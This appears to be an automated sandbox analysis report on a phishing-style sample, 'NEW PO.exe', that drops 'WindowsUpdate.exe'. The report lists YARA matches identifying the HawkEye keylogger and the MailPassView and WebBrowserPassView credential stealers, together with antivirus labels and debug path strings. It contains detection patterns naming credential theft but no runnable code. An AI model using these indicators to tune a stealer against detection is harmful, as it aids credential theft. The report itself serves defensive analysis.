15.2.WindowsUpdate.exe.3ca56d8.4.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x406406:$hawkstr1: HawkEye Keylogger 0x407247:$hawkstr1: HawkEye Keylogger 0x407576:$hawkstr1: HawkEye Keylogger 0x4076d1:$hawkstr1: HawkEye Keylogger 0x407834:$hawkstr1: HawkEye Keylogger 0x407acb:$hawkstr1: HawkEye Keylogger 0x488426:$hawkstr1: HawkEye Keylogger 0x489267:$hawkstr1: HawkEye Keylogger 0x489596:$hawkstr1: HawkEye Keylogger 0x4896f1:$hawkstr1: HawkEye Keylogger 0x489854:$hawkstr1: HawkEye Keylogger 0x489aeb:$hawkstr1: HawkEye Keylogger 0x405f78:$hawkstr2: Dear HawkEye Customers! 0x4075c9:$hawkstr2: Dear HawkEye Customers! 0x407720:$hawkstr2: Dear HawkEye Customers! 0x407887:$hawkstr2: Dear HawkEye Customers! 0x487f98:$hawkstr2: Dear HawkEye Customers! 0x4895e9:$hawkstr2: Dear HawkEye Customers! 0x489740:$hawkstr2: Dear HawkEye Customers! 0x4898a7:$hawkstr2: Dear HawkEye Customers! 0x406099:$hawkstr3: HawkEye Logger Details:
17.2.WindowsUpdate.exe.42156d8.5.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x405d51:$key: HawkEyeKeylogger 0x487d71:$key: HawkEyeKeylogger 0x407fcf:$salt: 099u787978786 0x489fef:$salt: 099u787978786 0x4063ae:$string1: HawkEye_Keylogger 0x407201:$string1: HawkEye_Keylogger 0x407f2f:$string1: HawkEye_Keylogger 0x4883ce:$string1: HawkEye_Keylogger 0x489221:$string1: HawkEye_Keylogger 0x489f4f:$string1: HawkEye_Keylogger 0x406797:$string2: holdermail.txt 0x4067b7:$string2: holdermail.txt 0x4887b7:$string2: holdermail.txt 0x4887d7:$string2: holdermail.txt 0x4066d9:$string3: wallet.dat 0x4066f1:$string3: wallet.dat 0x406707:$string3: wallet.dat 0x4886f9:$string3: wallet.dat 0x488711:$string3: wallet.dat 0x488727:$string3: wallet.dat 0x407af3:$string4: Keylog Records
17.2.WindowsUpdate.exe.42156d8.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x39191b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x41393b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
17.2.WindowsUpdate.exe.42156d8.5.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
17.2.WindowsUpdate.exe.42156d8.5.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
17.2.WindowsUpdate.exe.42156d8.5.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
17.2.WindowsUpdate.exe.42156d8.5.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x406406:$hawkstr1: HawkEye Keylogger 0x407247:$hawkstr1: HawkEye Keylogger 0x407576:$hawkstr1: HawkEye Keylogger 0x4076d1:$hawkstr1: HawkEye Keylogger 0x407834:$hawkstr1: HawkEye Keylogger 0x407acb:$hawkstr1: HawkEye Keylogger 0x488426:$hawkstr1: HawkEye Keylogger 0x489267:$hawkstr1: HawkEye Keylogger 0x489596:$hawkstr1: HawkEye Keylogger 0x4896f1:$hawkstr1: HawkEye Keylogger 0x489854:$hawkstr1: HawkEye Keylogger 0x489aeb:$hawkstr1: HawkEye Keylogger 0x405f78:$hawkstr2: Dear HawkEye Customers! 0x4075c9:$hawkstr2: Dear HawkEye Customers! 0x407720:$hawkstr2: Dear HawkEye Customers! 0x407887:$hawkstr2: Dear HawkEye Customers! 0x487f98:$hawkstr2: Dear HawkEye Customers! 0x4895e9:$hawkstr2: Dear HawkEye Customers! 0x489740:$hawkstr2: Dear HawkEye Customers! 0x4898a7:$hawkstr2: Dear HawkEye Customers! 0x406099:$hawkstr3: HawkEye Logger Details:
Click to see the 622 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Machine Learning detection for sample

Show sources

Source: NEW PO.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe

Joe Sandbox ML: detected

Source: 16.0.WindowsUpdate.exe.400000.6.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 16.0.WindowsUpdate.exe.400000.6.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.vbc.exe.400000.3.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.vbc.exe.400000.1.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.WindowsUpdate.exe.400000.21.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 16.0.WindowsUpdate.exe.400000.21.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.2.WindowsUpdate.exe.400000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.2.WindowsUpdate.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 16.2.WindowsUpdate.exe.400000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.WindowsUpdate.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 7.0.NEW PO.exe.400000.11.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.NEW PO.exe.400000.11.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.NEW PO.exe.474fbd0.5.unpack	Avira: Label: TR/Inject.vcoldi
Source: 7.0.NEW PO.exe.400000.6.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.NEW PO.exe.400000.6.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.0.WindowsUpdate.exe.400000.26.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.0.WindowsUpdate.exe.400000.26.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.0.WindowsUpdate.exe.400000.16.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.0.WindowsUpdate.exe.400000.16.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 23.0.vbc.exe.400000.3.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 23.0.vbc.exe.400000.2.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.vbc.exe.400000.4.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 23.0.vbc.exe.400000.1.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 7.0.NEW PO.exe.400000.38.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.NEW PO.exe.400000.38.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.0.WindowsUpdate.exe.400000.11.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.0.WindowsUpdate.exe.400000.11.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 23.0.vbc.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.0.WindowsUpdate.exe.400000.4.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.0.WindowsUpdate.exe.400000.4.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 17.2.WindowsUpdate.exe.459fbd0.4.unpack	Avira: Label: TR/Inject.vcoldi
Source: 16.0.WindowsUpdate.exe.400000.4.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 16.0.WindowsUpdate.exe.400000.4.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.vbc.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 11.0.vbc.exe.400000.2.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.0.WindowsUpdate.exe.400000.6.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.0.WindowsUpdate.exe.400000.6.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 23.0.vbc.exe.400000.4.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.0.WindowsUpdate.exe.400000.37.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.0.WindowsUpdate.exe.400000.37.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 7.0.NEW PO.exe.400000.21.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.NEW PO.exe.400000.21.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 7.0.NEW PO.exe.400000.16.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.NEW PO.exe.400000.16.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 18.0.WindowsUpdate.exe.400000.21.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 18.0.WindowsUpdate.exe.400000.21.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 15.2.WindowsUpdate.exe.402fbd0.5.unpack	Avira: Label: TR/Inject.vcoldi
Source: 16.0.WindowsUpdate.exe.400000.11.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 16.0.WindowsUpdate.exe.400000.11.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 16.0.WindowsUpdate.exe.400000.16.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 16.0.WindowsUpdate.exe.400000.16.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 7.0.NEW PO.exe.400000.26.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.NEW PO.exe.400000.26.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 7.0.NEW PO.exe.400000.4.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.0.NEW PO.exe.400000.4.unpack	Avira: Label: SPR/Tool.MailPassView.473
Source: 7.2.NEW PO.exe.400000.0.unpack	Avira: Label: TR/AD.MExecute.lzrac
Source: 7.2.NEW PO.exe.400000.0.unpack	Avira: Label: SPR/Tool.MailPassView.473

Source: NEW PO.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: NEW PO.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: anagement.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: wbemcomn.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: NapiNSP.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: jPC:\Windows\System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366985049.0000000007E1B000.00000004.00000010.sdmp
Source:	Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: ml.pdbZ source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb7 source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ml.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: symbols\dll\System.Runtime.Remoting.pdbd source: NEW PO.exe, 00000007.00000002.366985049.0000000007E1B000.00000004.00000010.sdmp
Source:	Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: ility.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: msctf.pdb} source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: ntmarta.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdb_ source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdbY source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.320473195.0000000007EE0000.00000004.00020000.sdmp, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.398190268.00000000032D1000.00000004.00000001.sdmp
Source:	Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: NEW PO.exe, 00000000.00000002.297183407.0000000004329000.00000004.00000001.sdmp, NEW PO.exe, 00000007.00000000.293845303.0000000000402000.00000040.00000001.sdmp, vbc.exe, WindowsUpdate.exe, 0000000F.00000002.359519718.0000000003C09000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000010.00000000.344193172.0000000000402000.00000040.00000001.sdmp, WindowsUpdate.exe, 00000011.00000002.373941007.0000000004179000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000000.401286482.00000000042D1000.00000004.00000001.sdmp, vbc.exe, 00000017.00000000.402469174.0000000000400000.00000040.00000001.sdmp
Source:	Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: dwmapi.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb+ source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: WindowsUpdate.PDB- source: WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.340221488.00000000054A0000.00000004.00000040.sdmp
Source:	Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.pdb` source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: symbols\dll\mscorlib.pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb. source: NEW PO.exe, 00000007.00000002.366368381.00000000072C0000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdbu source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdbq source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: ole32.pdbM source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: wimm32.pdbo source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdbG source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: CMemoryExecute.pdb`*" source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: DWrite.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Drawing.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: System.Management.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: NEW PO.exe, 00000007.00000002.366422934.00000000072F0000.00000004.00000001.sdmp
Source:	Binary string: gdiplus.pdbk source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: Accessibility.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: comctl32.pdbI source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: xecute.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: winhttp.pdb[ source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: Accessibility.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: rawing.pdb source: WerFault.exe, 0000000D.00000003.340006084.00000000054F2000.00000004.00000001.sdmp
Source:	Binary string: System.Management.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: pnrpnsp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: winnsi.pdbO source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: version.pdb{ source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: bcrypt.pdb~o{ source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: CMemoryExecute.pdb source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: mskeyprotect.pdb_ source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: iphlpapi.pdbU source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: dhcpcsvc6.pdbC source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.pdb source: NEW PO.exe, 00000007.00000002.366368381.00000000072C0000.00000004.00000001.sdmp
Source:	Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: DWrite.pdbw source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: nlaapi.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: j0C:\Windows\mscorlib.pdb source: NEW PO.exe, 00000007.00000002.367171586.000000000821A000.00000004.00000010.sdmp, WindowsUpdate.exe, 00000012.00000002.439840965.0000000008BEA000.00000004.00000010.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbm source: NEW PO.exe, 00000007.00000000.312477071.0000000000ED0000.00000004.00000001.sdmp
Source:	Binary string: m'Xn.pdb source: NEW PO.exe, 00000007.00000002.366985049.0000000007E1B000.00000004.00000010.sdmp
Source:	Binary string: wmswsock.pdbS source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: wmiutils.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: gdiplus.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: System.pdbx source: WerFault.exe, 0000000D.00000003.337353333.0000000005780000.00000004.00000001.sdmp
Source:	Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Runtime.Remoting.pdb0 source: NEW PO.exe, 00000007.00000002.366473803.0000000007337000.00000004.00000001.sdmp
Source:	Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
Source:	Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: sechost.pdb source: WerFault.exe, 0000000D.00000003.340137241.00000000054D1000.00000004.00000001.sdmp
Source:	Binary string: clrjit.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: ntasn1.pdb= source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: rasman.pdb source: WerFault.exe, 0000000D.00000003.339824230.00000000054B1000.00000004.00000001.sdmp
Source:	Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 0000000D.00000003.339860191.00000000054AB000.00000004.00000040.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WerFault.exe, 0000000D.00000003.339925797.00000000054F1000.00000004.00000001.sdmp
